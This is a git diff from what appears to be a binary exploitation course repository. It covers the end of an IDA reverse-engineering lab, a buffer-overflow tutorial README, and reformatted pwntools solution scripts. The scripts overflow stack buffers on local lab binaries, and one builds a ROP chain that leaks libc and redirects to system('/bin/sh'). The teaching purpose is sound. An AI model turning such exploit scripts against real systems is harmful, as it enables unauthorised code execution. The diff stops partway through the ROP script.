[ebp+arg_0], 2 -jz short loc_8049068 -``` - ---- - -**Remember!** - -On 32 bit systems, `[ebp + 0]` is the saved `ebp`, `[ebp + 4]` is the return address and `[ebp + 8]` is the first argument to the current function. IDA follows a slightly different naming convention: `[ebp + 8]` is named `[ebp+arg_0]`. `[ebp + 12]` is named `[ebp+arg_4]` etc. 
You can rename those `arg_*` constructs if you want, anyway. - ---- - -So it's referring to the first argument: `argc`. Basically, what it does is: - -```c -if(argc == 2) { - goto loc_8049068 -} else { -.... -} -``` - -What does the `else` branch do? - -```asm -mov eax, [ebp+arg_4] -mov eax, [eax] -mov [esp+4], eax -mov dword ptr [esp], offset format ; "Usage: %s \n" -call _printf - -mov dword ptr [esp], 0 ; status -call _exit -``` - -It's pretty straightforward if you remember the tasks from [Session 02](https://github.com/hexcellents/sss-exploit/tree/master/sessions/03-executable-file-formats). The second argument (`argv`) is dereferenced and pushed on the stack along with a format string. Then `printf` is called. Next, `exit` is called with a status of 0. - -```c -if(argc == 2) { - goto loc_8049068 -} else { - printf("%s \n", argv[0]); - exit(0); -} -``` - -Now let's do something a bit more advanced: we want to identify the 2 commands that the server accepts by using static analysis. How do we approach this problem as fast as possible? We already know that the server accepts multiple clients. It can do this through forking. Let's see where `fork` is called in the program. First find the `fork` function on the left panel and select it. Now you see a stub to it from the `PLT` section. We want to find all locations in the program that call this function. You can achieve this by obtaining all the **cross-references (xrefs)** to it by pressing `x`. You should get the following screen: -![fork cross-references 1](../media/fork_xref_1.png) - -Click that location and you will get to the forking point: -![fork cross-references 2](../media/fork_xref_2.png) - -You can see that the return value is stored on the stack at `[esp+438h]`, some error checking (`perror` and `exit`) is done and then the return value is checked for 0 (as we traditionally do for `fork` calls). The child will execute `sub_8048ED7` and the parent will loop back. 
You can rename `sub_8048ED7` to something more legible such as `handle_child_process` -In this function you can now clearly see the two commands and which function is called for each: -![handle_child_process](../media/handle_child_process.png) - -It looks like the one on the left, `sub_8048B0B` handles the `LIST` command so we rename it to `handle_LIST`. As expected, it calls `opendir` and `readdir` to read all the files in the current directory, then writes them to the socket. -![handle_LIST](../media/handle_LIST.png) - -## IDA tips & tricks - -- Saving progress is disabled for the trial version. However, you can save a limited (but useful) subset of your work using `File -> Produce File -> Dump database to IDC file` and then load it next time using `File -> Script File`. -- If you close some windows and don't know how to get them back you can reset the layout using `Windows->Reset Desktop`. -- If you want to return to the previous view you can press `Escape`. -- When you want to view code as in `objdump` you only need to press `Spacebar` once. And then again to return to CFG mode. -- If there is a hex value and you want to convert it to decimal (or back) press `h`. -- Converting hex/dec values to _ASCII_: press `r`. -- If you want to write comments next to an instruction or a function press `:`. - -## IDA Pro and Ghidra - -IDA Pro is installed on the Kali virtual machine. The main difference between it and the free version is that the Pro one can also **decompile** the code based on the CFGs listed above. This will come in extremely useful as we hack more and more binaries. - -Another tool that is capable of decompiling the code in an executable is [Ghidra](https://ghidra-sre.org/). One advantage of Ghidra over IDA is that Ghidra displays both the C and the Assembly code side by side. This allows us to correlate the two and reap the benefits of both of them at the same time. 
- -# C++ - -Things look slightly different when we try to hack executables that have been compiled from C++ code, instead of C. The difference comes from the way symbols (method symbols in particular) are handled by C++ compilers. Let's disassemble the code below and see how its symbols look: - -```code c -#include -using namespace std; -int main() -{ - cout << "Hello world" << endl; - return 0; -} -``` - -Disassembling it in IDA looks familiar at first -![IDA _start](../media/ida_c%2B%2B_start.png) - -But then the fun starts: -![IDA main](../media/ida_c%2B%2B_main.png) - -As we can see, all symbols look almost as if they were encrypted. In fact, this process is called **name mangling**. If we take a closer look at them, however, we can distinguish some clues about those function calls, for example. The first one contains the sequences `char_traits` and `basic_ostream`, the former being a C++ abstraction for string operations, while the latter is a base class for output operators, such as `<<`. - -IDA can demangle strings such as the ones above by itself. Some recommended settings (you may prefer something different) are the following: - -- `Options -> Demangled names` -- Show demangled C++ names as `Names` -- `Setup short names` -- Click `Only main name` - -These settings only display the important classes and namespaces that make up each method, like this: -![IDA demangled](../media/ida_c%2B%2B_demangled.png) - -# Further reading - -More information about name mangling can be obtained at: - -- https://en.wikipedia.org/wiki/Name_mangling -- on demand demangling: http://demangler.com/ or c++filt - -You can find out more information about the internals of C++ in general, using the following references: - -- https://ocw.cs.pub.ro/courses/cpl/labs/06 (in Romanian) -- https://www.blackhat.com/presentations/bh-dc-07/Sabanal_Yason/Paper/bh-dc-07-Sabanal_Yason-WP.pdf -- http://www.hexblog.com/wp-content/uploads/2011/08/Recon-2011-Skochinsky.pdf - -# Challenges - -## 04. 
crypto_crackme - -The `crypto_crackme` binary is an application that asks for a secret and uses it to decrypt a message. In order to solve this task, you have to retrieve the message. - -- Open the binary using IDA and determine the program control flow. What is it doing after fetching the secret? It seems to be consuming a lot of CPU cycles. If possible, use IDA to patch the program and reduce the execution time of the application. Use ''Edit -> Patch program -> Change byte...'' -- Next, it looks like the program tries to verify if the secret provided is correct. Where is the secret stored? Is it stored in plain text? Find out what the validation algorithm is. -- Now break it and retrieve the message! - ---- - -**Important!** - -Unfortunately, the virtual machine doesn't support the libssl1.0.0 version of SSL library. Use the library files in the task archive and run the executable using: - -```bash -LD_LIBRARY_PATH=. ./crypto_crackme -``` - -You can break password hashes (including SHA1) on [CrackStation](https://crackstation.net/). - ---- - -## 05. broken - -The `broken` binary is asking you for the correct password. Investigate the binary and provide it with the correct password. If you provided the correct password the message `%%That's correct! The password is '...'%%`. - -## 06. hyp3rs3rv3r - -Investigate the `hyp3rs3rv3r` binary and find out where the backdoor function is. Note that since it's not directly called, IDA doesn't think of it as a procedure, so it won't come up on the left pane. Figure out a way around this. When you find that code block you can press `p` on the first instruction to help IDA see it as a procedure. - -
-Tip - -In order to exploit the vulnerability in Ubuntu, you should use netcat-traditional. You can switch from netcat-openbsd to netcat-traditional using the steps described [here](https://stackoverflow.com/questions/10065993/how-to-switch-to-netcat-traditional-in-ubuntu). - -
diff --git a/chapters/exploitation-techniques/buffer-exploitation/drills/00-tutorial/src/script.py b/chapters/exploitation-techniques/buffer-exploitation/drills/00-tutorial/src/script.py index 3a08820..8775978 100644 --- a/chapters/exploitation-techniques/buffer-exploitation/drills/00-tutorial/src/script.py +++ b/chapters/exploitation-techniques/buffer-exploitation/drills/00-tutorial/src/script.py @@ -1,29 +1,37 @@ from pwn import * -elf = ELF('buffers') +elf = ELF("buffers") -bss = elf.get_section_by_name('.bss') -data = elf.get_section_by_name('.data') -rodata = elf.get_section_by_name('.rodata') +bss = elf.get_section_by_name(".bss") +data = elf.get_section_by_name(".data") +rodata = elf.get_section_by_name(".rodata") -bss_addr = bss['sh_addr'] -data_addr = data['sh_addr'] -rodata_addr = rodata['sh_addr'] +bss_addr = bss["sh_addr"] +data_addr = data["sh_addr"] +rodata_addr = rodata["sh_addr"] -bss_size = bss['sh_size'] -data_size = data['sh_size'] -rodata_size = rodata['sh_size'] +bss_size = bss["sh_size"] +data_size = data["sh_size"] +rodata_size = rodata["sh_size"] # A (Alloc) = 1 << 1 = 2 # W (Write) = 1 << 0 = 1 -bss_flags = bss['sh_flags'] -data_flags = data['sh_flags'] -rodata_flags = rodata['sh_flags'] +bss_flags = bss["sh_flags"] +data_flags = data["sh_flags"] +rodata_flags = rodata["sh_flags"] print("Section info:") -print(".bss: 0x{:08x}-0x{:08x}, {}".format(bss_addr, bss_addr+bss_size, bss_flags)) -print(".data: 0x{:08x}-0x{:08x}, {}".format(data_addr, data_addr+data_size, data_flags)) -print(".rodata: 0x{:08x}-0x{:08x}, {}".format(rodata_addr, rodata_addr+rodata_size, rodata_flags)) +print(".bss: 0x{:08x}-0x{:08x}, {}".format(bss_addr, bss_addr + bss_size, bss_flags)) +print( + ".data: 0x{:08x}-0x{:08x}, {}".format( + data_addr, data_addr + data_size, data_flags + ) +) +print( + ".rodata: 0x{:08x}-0x{:08x}, {}".format( + rodata_addr, rodata_addr + rodata_size, rodata_flags + ) +) print() diff --git 
a/chapters/exploitation-techniques/buffer-exploitation/drills/01-challenge-parrot/sol/solve.py b/chapters/exploitation-techniques/buffer-exploitation/drills/01-challenge-parrot/sol/solve.py index 5b67b3c..eacdb64 100644 --- a/chapters/exploitation-techniques/buffer-exploitation/drills/01-challenge-parrot/sol/solve.py +++ b/chapters/exploitation-techniques/buffer-exploitation/drills/01-challenge-parrot/sol/solve.py @@ -1,12 +1,12 @@ #!/usr/bin/env python from pwn import * -elf = ELF('parrot') -p = process('parrot') +elf = ELF("parrot") +p = process("parrot") -payload = b'A' * (0x20 - 0x4) +payload = b"A" * (0x20 - 0x4) payload += p32(1337) -payload += b'A' * 8 +payload += b"A" * 8 payload += p64(elf.symbols.get_shell) print(payload) diff --git a/chapters/exploitation-techniques/buffer-exploitation/drills/02-challenge-indexing/sol/solve.py b/chapters/exploitation-techniques/buffer-exploitation/drills/02-challenge-indexing/sol/solve.py index ee160a9..7408fe1 100644 --- a/chapters/exploitation-techniques/buffer-exploitation/drills/02-challenge-indexing/sol/solve.py +++ b/chapters/exploitation-techniques/buffer-exploitation/drills/02-challenge-indexing/sol/solve.py @@ -1,17 +1,19 @@ #!/usr/bin/env python from pwn import * -elf = ELF('../src/indexing') -p = process('indexing') +elf = ELF("../src/indexing") +p = process("indexing") + def scanf_pad(s): - return s + b' ' * (4096-len(s)) + return s + b" " * (4096 - len(s)) + -p.recvuntil(b'Index: ') -p.send(scanf_pad(b'-3')) +p.recvuntil(b"Index: ") +p.send(scanf_pad(b"-3")) # Give value -p.recvuntil(b'Value: ') +p.recvuntil(b"Value: ") p.send(scanf_pad(str(elf.symbols.get_shell).encode())) p.interactive() diff --git a/chapters/exploitation-techniques/buffer-exploitation/drills/03-challenge-level7/sol/solve.py b/chapters/exploitation-techniques/buffer-exploitation/drills/03-challenge-level7/sol/solve.py index 4531c9e..dd0be8b 100644 --- 
a/chapters/exploitation-techniques/buffer-exploitation/drills/03-challenge-level7/sol/solve.py +++ b/chapters/exploitation-techniques/buffer-exploitation/drills/03-challenge-level7/sol/solve.py @@ -1,8 +1,8 @@ from pwn import * -p = process(['../src/level07']) +p = process(["../src/level07"]) -p.sendline(str(-2**31 + (0x30 // 4))) -p.sendline(p32(0x574f4c46) * (0x30 // 4)) +p.sendline(str(-(2**31) + (0x30 // 4))) +p.sendline(p32(0x574F4C46) * (0x30 // 4)) p.interactive() diff --git a/chapters/exploitation-techniques/buffer-exploitation/drills/04-challenge-neighbourly/sol/solve.py b/chapters/exploitation-techniques/buffer-exploitation/drills/04-challenge-neighbourly/sol/solve.py index a051e97..b537437 100644 --- a/chapters/exploitation-techniques/buffer-exploitation/drills/04-challenge-neighbourly/sol/solve.py +++ b/chapters/exploitation-techniques/buffer-exploitation/drills/04-challenge-neighbourly/sol/solve.py @@ -4,7 +4,7 @@ e = ELF("neighbourly") p = process("neighbourly") -payload = b'A'*32 +payload = b"A" * 32 payload += p64(e.symbols.win) p.sendline(payload) diff --git a/chapters/exploitation-techniques/buffer-exploitation/drills/05-challenge-input-functions/sol/solve.py b/chapters/exploitation-techniques/buffer-exploitation/drills/05-challenge-input-functions/sol/solve.py index f85f759..f4b8872 100644 --- a/chapters/exploitation-techniques/buffer-exploitation/drills/05-challenge-input-functions/sol/solve.py +++ b/chapters/exploitation-techniques/buffer-exploitation/drills/05-challenge-input-functions/sol/solve.py @@ -2,11 +2,11 @@ from time import sleep -p = process('input_functions') +p = process("input_functions") for i in range(10): - p.recvuntil(b'((') - n = int(p.recvuntil(b')')[:-1]) + p.recvuntil(b"((") + n = int(p.recvuntil(b")")[:-1]) p.sendline(p64(n)) print("Done {}".format(i)) @@ -14,20 +14,20 @@ print() for i in range(10): - p.recvuntil(b'[[') - n = int(p.recvuntil(b']')[:-1]) + p.recvuntil(b"[[") + n = int(p.recvuntil(b"]")[:-1]) - 
p.send(p64(n) + b'\x00' * 24) + p.send(p64(n) + b"\x00" * 24) print("Done {}".format(i)) print() -#gdb.attach(p) +# gdb.attach(p) for i in range(10): - p.recvuntil(b'{{') - n1 = int(p.recvuntil(b'}')[:-1]) - p.recvuntil(b'{{') - n2 = int(p.recvuntil(b'}')[:-1]) + p.recvuntil(b"{{") + n1 = int(p.recvuntil(b"}")[:-1]) + p.recvuntil(b"{{") + n2 = int(p.recvuntil(b"}")[:-1]) p.sendline(str(n1)) sleep(0.5) diff --git a/chapters/exploitation-techniques/buffer-exploitation/drills/06-challenge-birds/sol/solve.py b/chapters/exploitation-techniques/buffer-exploitation/drills/06-challenge-birds/sol/solve.py index 8293fb8..701fcb3 100644 --- a/chapters/exploitation-techniques/buffer-exploitation/drills/06-challenge-birds/sol/solve.py +++ b/chapters/exploitation-techniques/buffer-exploitation/drills/06-challenge-birds/sol/solve.py @@ -1,16 +1,16 @@ #!/usr/bin/env python from pwn import * -p = process('../src/birds') +p = process("../src/birds") # p = remote('127.0.0.1', 31335) -payload = b'A'*(0x30+4) +payload = b"A" * (0x30 + 4) payload += p32(0x539) -payload += p32(0x1337ca5e) -payload += p32(0xdeadc0de) +payload += p32(0x1337CA5E) +payload += p32(0xDEADC0DE) p.sendline(payload) -#p.sendline(p64(0x40119d)) +# p.sendline(p64(0x40119d)) p.sendline(p64(0x401203)) p.interactive() diff --git a/chapters/exploitation-techniques/buffer-exploitation/reading/README.md b/chapters/exploitation-techniques/buffer-exploitation/reading/README.md index be83500..a57de33 100644 --- a/chapters/exploitation-techniques/buffer-exploitation/reading/README.md +++ b/chapters/exploitation-techniques/buffer-exploitation/reading/README.md @@ -1,38 +1,14 @@ ---- -linkTitle: Buffer Exploitation -type: docs -weight: 10 ---- - # Buffer Exploitation -Table of Contents -================= - -* [Overview](#overview) - * [Pwntools](#pwntools) - * [Buffers](#buffers) - * [Stack buffer overflow](#stack-buffer-overflow) - * [Buffer size and offset identification](#buffer-size-and-offset-identification) - * [Static 
Analysis](#static-analysis) - * [Dynamic analysis](#dynamic-analysis) - * [Input-Output functions](#input-output-functions) -* [Challenges](#challenges) - * [01. Challenge: Parrot](#01-challenge-parrot) - * [02. Challenge: Indexing](#02-challenge-indexing) - * [03. Challenge: Smashthestack Level7](#03-challenge-smashthestack-level7) - * [04. Challenge: Neighbourly](#04-challenge-neighbourly) - * [05. Challenge: Input Functions](#05-challenge-input-functions) - * [06. Challenge: Bonus: Birds](#06-challenge-bonus-birds) -* [Further Reading](#further-reading) - ## Pwntools -In this lab we will be using the `pwntools` python module to solve the tasks. Check outh the [Pwntools Tutorial section](../../extra/pwntools-intro/README.md). +In this lab we will be using the `pwntools` python module to solve the tasks. +Check out the [Pwntools Tutorial section](../../../extra/pwntools-intro/reading). ## Buffers -A buffer is an area of contiguous data in memory, determined by a starting address, contents and length. Understanding how buffers are used (or misused) is vital for both offensive and defensive purposes. +A buffer is an area of contiguous data in memory, determined by a starting address, contents and length. +Understanding how buffers are used (or misused) is vital for both offensive and defensive purposes. In C, we can declare a buffer of bytes as a char array, as follows: ```c @@ -41,20 +17,25 @@ char local_buffer[32]; Which results in the following assembly code: -```nasm +```asm push rbp mov rbp,rsp sub rsp,0x20 ... ret ``` -Notice that buffer allocation is done by simply subtracting its intended size from the current stack pointer (`sub rsp, 0x20`). This simply reserves space on the stack (remember that on x86 the stack grows “upwards”, from higher addresses to lower ones). -> A compiler may allocate more space on the stack than explicitly required due to alignment constraints or other hidden values.
To exploit a program, the C source code may not be a good enough reference point for stack offsets. Only disassembling the executable will provide relevant information. +Notice that buffer allocation is done by simply subtracting its intended size from the current stack pointer (`sub rsp, 0x20`). +This simply reserves space on the stack (remember that on x86 the stack grows “upwards”, from higher addresses to lower ones). + +A compiler may allocate more space on the stack than explicitly required due to alignment constraints or other hidden values. +To exploit a program, the C source code may not be a good enough reference point for stack offsets. +Only disassembling the executable will provide relevant information. Buffers can be also be stored in other places in memory, such as the heap, `.bss`, `.data` or `.rodata`. Analyze and compile the following snippet (also present in the lab files, go to `00-tutorial` and run `make buffers`): + ```c #include #include @@ -76,9 +57,11 @@ int main(void) } ``` -Check the common binary sections and symbols. Use the usual coomands (`readelf -S`, `nm`). +Check the common binary sections and symbols. +Use the usual commands (`readelf -S`, `nm`). Observe in which section each variable is located and the section flags. -
+
+```console
 $ readelf -S buffers
 ...
   [16] .rodata           PROGBITS         0000000000402000  00002000
@@ -104,9 +87,10 @@ Key to Flags:
   B (symbol in BSS data section)
 
   A lowercase flag means variable is not visible local (not visible outside the object)
-
+``` You can also inspect these programmatically using pwntools and the ELF class: + ```python from pwn import * @@ -144,6 +128,7 @@ print("g_buf_const: 0x{:08x}".format(elf.symbols.g_buf_const)) ``` Another handy utility is the `vmmap` command in `pwndbg` which shows all memory maps of the process at runtime: + ```gdb pwndbg> b main pwngdb> run @@ -160,25 +145,30 @@ LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA 0xffffffffff600000 0xffffffffff601000 --xp 1000 0 [vsyscall] ``` -Non-static local variables and dynamically allocated buffers cannot be seen in the executable (they have meaning only at runtime, because they are allocated on the stack or heap in a function scope). The symbol names aren't found anywhere in the binary, except if debug symbols are enabled (`-g` flag). +Non-static local variables and dynamically allocated buffers cannot be seen in the executable (they have meaning only at runtime, because they are allocated on the stack or heap in a function scope). +The symbol names aren't found anywhere in the binary, except if debug symbols are enabled (`-g` flag). -## Stack buffer overflow +## Stack Buffer Overflow - +![Stack Overflow](../media/stack_x86_64.png) -> Note that this is the stack for a 64bit system and the first couple of function arguments are stored in registers (rdi, rsi, rdx, rcx, r8, and r9) and that's why the images has `arg_6` as the first argument. +Note that this is the stack for a 64bit system and the first couple of function arguments are stored in registers (rdi, rsi, rdx, rcx, r8, and r9) and that's why the images has `arg_6` as the first argument. 
We should know by now that the stack serves multiple purposes: -* Passing function arguments from the caller to the callee -* Storing local variables for functions -* Temporarily saving register values before a call -* Saving the return address and old frame pointer -Even though, in an abstract sense, different buffers are separate from one another, ultimately they are just some regions of memory which do not have any intrinsic identification or associated size. To avoid this, most hight level languages use size metadata and bound checks to detect out of bounds accesses to the memory. +- Passing function arguments from the caller to the callee +- Storing local variables for functions +- Temporarily saving register values before a call +- Saving the return address and old frame pointer + +Even though, in an abstract sense, different buffers are separate from one another, ultimately they are just some regions of memory which do not have any intrinsic identification or associated size. +To avoid this, most hight level languages use size metadata and bound checks to detect out of bounds accesses to the memory. -But in our case, bounds are unchecked, therefore it is up to the programmer to code carefully. This includes checking for any overflows and using **safe functions**. Unfortunately, many functions in the standard C library, particularly those which work with strings and read user input, are unsafe - nowadays, the compiler will issue warnings when encountering them. +But in our case, bounds are unchecked, therefore it is up to the programmer to code carefully. +This includes checking for any overflows and using **safe functions**. +Unfortunately, many functions in the standard C library, particularly those which work with strings and read user input, are unsafe - nowadays, the compiler will issue warnings when encountering them. 
-### Buffer size and offset identification +### Buffer Size and Offset Identification When trying to overflow a buffer on the stack we need to know the size and where the buffer is in memory relative to the saved return address (or some other control flow altering value/pointer). @@ -187,6 +177,7 @@ When trying to overflow a buffer on the stack we need to know the size and where One way, for simple programs, you can do **static analysis** and check some key points in the diassembled code. For example, this simple program (`00-tutorial/simple_read`, run `make simple_read` to compile): + ```c #include @@ -197,8 +188,9 @@ int main(void) { } ``` -generates the following assembly: -```nasm +generates the following assembly code: + +```asm push rbp mov rbp,rsp sub rsp,0x90 @@ -232,24 +224,26 @@ leave ret ``` -Looking at the `fread` arguments we can see the buffer start relative to `RBP` and the number of bytes read. `RBP-0x80+0x100*0x1 = RBP+0x80`, so the fread function can read 128 bytes after `RBP` -> return address stored at 136 bytes after `RBP`. +Looking at the `fread` arguments we can see the buffer start relative to `RBP` and the number of bytes read. +`RBP-0x80+0x100*0x1 = RBP+0x80`, so the fread function can read 128 bytes after `RBP` -> return address stored at 136 bytes after `RBP`. +![Stack Buffer](../media/stack_buffer.png) - +#### Dynamic Analysis - -#### Dynamic analysis - -You can determine offsets at runtime in a more automated way with pwndbg using an [De Bruijin sequences](https://en.wikipedia.org/wiki/De_Bruijn_sequence) which produces strings where every substring of length N appears only once in the sequence; in our case it helps us identify the offset of an exploitable memory value relative to the buffer. 
+You can determine offsets at runtime in a more automated way with pwndbg using an [De Bruijin sequences](https://en.wikipedia.org/wiki/De_Bruijn_sequence) which produces strings where every substring of length N appears only once in the sequence; +in our case it helps us identify the offset of an exploitable memory value relative to the buffer. For a simple buffer overflow the worflow is: + 1. generate an long enough sequence to guarantee a buffer overflow -2. feed the generated sequence to the input function in the program -3. the program will produce a segmentation fault when reaching the invalid return address on the stack -4. search the offset of the faulty address in the generated pattern to get an offset +1. feed the generated sequence to the input function in the program +1. the program will produce a segmentation fault when reaching the invalid return address on the stack +1. search the offset of the faulty address in the generated pattern to get an offset In pwndbg this works as such: -``` + +```console pwndbg> cyclic -n 8 256 aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaab pwndbg> run @@ -272,49 +266,66 @@ Program received signal SIGSEGV, Segmentation fault pwndbg> cyclic -n 8 -c 64 -l 0x6161616161616172 136 ``` -_Note: we get the same 136 offset computed manually with the static analysis method._ -## Input-Output functions +**Note**: +We get the same 136 offset computed manually with the static analysis method. 
+ +## Input-Output Functions Most programs aren't a straight forward single input buffer overflow so we need to deal with things like: -* automizing program input-output - by programmatically sending and receiving data -* parsing program output - to use potential leaked information -* understand the mechanics of the IO methods used - what kind of data they accept and possible constraints -_Pwntools_ offers a large area of [IO functions](https://docs.pwntools.com/en/stable/tubes.html) to communicate with a program (either local or remote). +- automating program input-output - by programmatically sending and receiving data +- parsing program output - to use potential leaked information +- understanding the mechanics of the IO methods used - what kind of data they accept and possible constraints + +`pwntools` offers a wide range of [IO functions](https://docs.pwntools.com/en/stable/tubes.html) to communicate with a program (either local or remote). The basic and usual ones are: -* `send(data)` - sends the `data` byte string to the process -* `sendline(data)` - shorthand for `send(data + b"\n")` -* `recv(num)` - recieves `num` bytes from the process -* `recvline()` - recieves a whole line from the process (until '\n') -* `recvuntil(str)` - receives data until `str` is found (will not contain `str`) -* `recvall()` - receives the full program ouptut (until EOF) -> Check the documentation for more complex IO functions that might come in handy (like `recvregex`, `sendafter`). +- `send(data)` - sends the `data` byte string to the process +- `sendline(data)` - shorthand for `send(data + b"\n")` +- `recv(num)` - receives up to `num` bytes from the process +- `recvline()` - receives a whole line from the process (until '\n') +- `recvuntil(str)` - receives data until `str` is found (the returned data includes `str` unless `drop=True` is passed) +- `recvall()` - receives the full program output (until EOF) + +Check the documentation for more complex IO functions that might come in handy (like `recvregex`, `sendafter`). 
+ +It is also important to understand the functionality of the different IO functions the program itself uses. +For C programs, in our case, you can always +find useful information in the man pages of specific functions: + +- `size_t fread(void *ptr, size_t size, size_t nmemb, FILE *stream)`: + Reads *nmemb* items of data, each *size* bytes long, simple and straightforward. +- `char *gets(char *s)`: + Reads until either a terminating newline or EOF, which it replaces with a null byte ('\0'). + The problem here is that you won't be able to have a newline in the middle of your payload; + note that it doesn't have a size argument so it will read indefinitely as long as it doesn't reach a newline or `EOF`. +- `char *fgets(char *s, int size, FILE *stream)`: + Reads in **at most** one less than *size* characters from stream and stores them into the buffer pointed to by s. + Reading stops after an **EOF** or a **newline**. + If a **newline** is read, it is stored into the buffer. + A terminating null byte ('\0') is stored after the last character in the buffer. + This one adds the size limit argument, but also note that it **stores** the newline in the string and **adds** the null byte after (in contrast to `gets`). +- `int scanf(const char *format, ...)`: + As opposed to the other functions, `scanf` reads **text** based on the format string and parses it. + Don't do the common mistake of **sending binary data to scanf**, for example `"%d"` expects a string representation of a number like `"16"`, not the binary data like `"\x00\x00\x00\x10"`. -It is also important to understand the functionality of the different IO functions the program itself uses. 
For C programs, in our case, you can always -find useful information in the man pages of specific functions, TL;DR: -* `size_t fread(void *ptr, size_t size, size_t nmemb, FILE *stream)` - reads *nmemb* items of data, each *size* bytes long, - * simple and straightforward -* `char *gets(char *s)` - reads until either a terminating newline or EOF, which it replaces with a null byte ('\0') - * the problem here is that you won't be able to have a newline in the middle of your payload; note that it doesn't have a size argument to it will read indefinetely as long as it doesn't reach a newline or EOF -* `char *fgets(char *s, int size, FILE *stream)` - reads in **at most** one less than *size* characters from stream and stores them into the buffer pointed to by s. Reading stops after an **EOF** or a **newline**. If a **newline** is read, it is stored into the buffer. A terminating null byte ('\0') is stored after the last character in the buffer. - * this one adds the size limit argument, but also note that it **stores** the newline in the string and **adds** the null byte after (in contrast to `gets`) -* `int scanf(const char *format, ...)` - as opposed the other funcions `scanf` reads **text** based on the format string and parses it - * don't do the common mistake of **sending binary data to scanf**, for example `"%d"` expects a string representation of a numer like `"16"`, not the binary data like `"\x00\x00\x00\x10"` +Every time you encounter a new input function check the documentation to find it's limitations -> Every time you encounter a new input function check the documentation to find it's limitations +## Challenges -# Challenges -## 01. Challenge: Parrot +### 01. Challenge: Parrot -Some programs feature a stack _smashing protection_ in the form of stack canaries, that is, values kept on the stack which are checked before returning from a function. 
If the value has changed, then the “canary” can conclude that stack data has been corrupted throughout the execution of the current function. +Some programs feature a stack smashing protection in the form of stack canaries, that is, values kept on the stack which are checked before returning from a function. +If the value has changed, then the “canary” can conclude that stack data has been corrupted throughout the execution of the current function. -We have implemented our very own `parrot`. Can you avoid it somehow? +We have implemented our very own `parrot`. +Can you avoid it somehow? -## 02. Challenge: Indexing +### 02. Challenge: Indexing -More complex programs require some form of protocol or user interaction. This is where _pwntools_ shines. +More complex programs require some form of protocol or user interaction. +This is where `pwntools` shines. Here's an interactive script to get you started: ```python @@ -332,39 +343,39 @@ Here's an interactive script to get you started: p.interactive() ``` -> Go through GDB when aiming to solve this challenge. As all input values are strings, you can input them at the keyboard and follow their effect in GDB. - -## 03. Challenge: Smashthestack Level7 - -Now you can tackle a real challenge. See if you can figure out how you can get a shell from this one. - -> Hints: - -> There's an integer overflow + buffer overflow in the program. - -> How does integer multiplication work at a low level? Can you get get a positive number by multiplying a negative number by 4? - -> To pass command line arguments in gdb use `run arg1 arg2 ...` or `set args arg1 arg2 ...` before a `run` command +Go through GDB when aiming to solve this challenge. +As all input values are strings, you can input them at the keyboard and follow their effect in GDB. -> In _pwntools_ you can pass a list to `process` (`process(['./level07', arg1, arg2]`) +### 03. Challenge: Smashthestack Level7 -## 04. Challenge: Neighbourly +Now you can tackle a real challenge. 
+See if you can figure out how you can get a shell from this one. -Let's overwrite a structure's function pointer using a buffer overflow in its vicinity. The principle is the same. +Hints: -## 05. Challenge: Input Functions +- There's an integer overflow + buffer overflow in the program. +- How does integer multiplication work at a low level? + Can you get a positive number by multiplying a negative number by 4? +- To pass command line arguments in gdb use `run arg1 arg2 ...` or `set args arg1 arg2 ...` before a `run` command +- In `pwntools` you can pass a list to `process` (`process(['./level07', arg1, arg2])`) -On the same idea as the _Indexing_ challenge but much harder. Carefully check what input functions are used and parse the input accordingly. +### 04. Challenge: Neighbourly -## 06. Challenge: Bonus: Birds +Let's overwrite a structure's function pointer using a buffer overflow in its vicinity. +The principle is the same. -Time for a more complex challenge. Be patient and don't speed through it. +### 05. Challenge: Input Functions -# Further Reading +On the same idea as the "Indexing" challenge but much harder. +Carefully check what input functions are used and parse the input accordingly. -[De Bruijin sequences](https://en.wikipedia.org/wiki/De_Bruijn_sequence) +### 06. Challenge: Bonus: Birds -[PwnTools ELF Module](https://docs.pwntools.com/en/latest/elf/elf.html) (which internally uses [PyElftoools](https://github.com/eliben/pyelftools) and may expose such objects) +Time for a more complex challenge. +Be patient and don't speed through it. 
-[PwnTools IO](https://docs.pwntools.com/en/stable/tubes.html) +## Further Reading +- [De Bruijin sequences](https://en.wikipedia.org/wiki/De_Bruijn_sequence) +- [PwnTools ELF Module](https://docs.pwntools.com/en/latest/elf/elf.html) (which internally uses [PyElftoools](https://github.com/eliben/pyelftools) and may expose such objects) +- [PwnTools IO](https://docs.pwntools.com/en/stable/tubes.html) diff --git a/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/01-leak-call-system/sol/exploit.py b/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/01-leak-call-system/sol/exploit.py index e94b205..b719682 100644 --- a/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/01-leak-call-system/sol/exploit.py +++ b/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/01-leak-call-system/sol/exploit.py @@ -2,37 +2,55 @@ binary = "rop" -context.log_level = 'error' +context.log_level = "error" context.binary = binary p = process(binary) elf = ELF(binary) -libc = ELF("/usr/lib/libc.so.6") # from `ldd rop` +libc = ELF("/usr/lib/libc.so.6") # from `ldd rop` off = 0x38 pop_rdi = 0x0000000000401203 pop_rsi_r15 = 0x0000000000401201 -pop_rdx = 0x000000000040113a +pop_rdx = 0x000000000040113A sh = 0x403004 # write(1, read@got, 8) -leak_chain = p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(elf.got['read']) + p64(0) + p64(pop_rdx) + p64(8) + p64(elf.plt['write']) +leak_chain = ( + p64(pop_rdi) + + p64(1) + + p64(pop_rsi_r15) + + p64(elf.got["read"]) + + p64(0) + + p64(pop_rdx) + + p64(8) + + p64(elf.plt["write"]) +) # read(0, read@got, 8) -ow_got_chain = p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(elf.got['read']) + p64(0) + p64(pop_rdx) + p64(8) + p64(elf.plt['read']) +ow_got_chain = ( + p64(pop_rdi) + + p64(0) + + p64(pop_rsi_r15) + + p64(elf.got["read"]) + + p64(0) + + p64(pop_rdx) + + p64(8) + + p64(elf.plt["read"]) +) # read(buf) -> system("/bin/sh") -call_system_chain = 